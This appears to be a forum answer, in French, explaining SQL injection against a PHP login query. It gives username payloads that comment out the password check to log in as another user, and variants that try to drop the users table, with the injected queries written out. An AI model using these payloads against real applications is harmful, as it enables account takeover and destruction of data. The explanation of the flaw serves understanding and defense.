Quelque chose comme ça devrait faire :
- Pour vous connecter en tant qu'utilisateur "foo", définissez le nom d'utilisateur sur "foo' -- "
Cela donnera à votre requête l'apparence
$res = mysql_query("SELECT * from users where user='foo' -- ' AND pass=''");
Le "--" signifie que le reste de la ligne est commenté
- Je ne sais pas si cela fonctionnera, mais essayez de définir le nom d'utilisateur sur "foo' OR (DROP TABLE users) -- "
Cela fera ressembler votre requête à :
$res = mysql_query("SELECT * from users where user='foo' OR (DROP TABLE users) -- ' AND pass=''");
pourrait ne pas accepter cela cependant - je pense que les sous-requêtes ne peuvent que SELECT.
La fonction mysql_query n'exécutera qu'une seule requête - d'autres vous permettraient de faire ceci :
$res = mysql_query("SELECT * from users where user='foo'; DROP TABLE users -- ' AND pass=''");
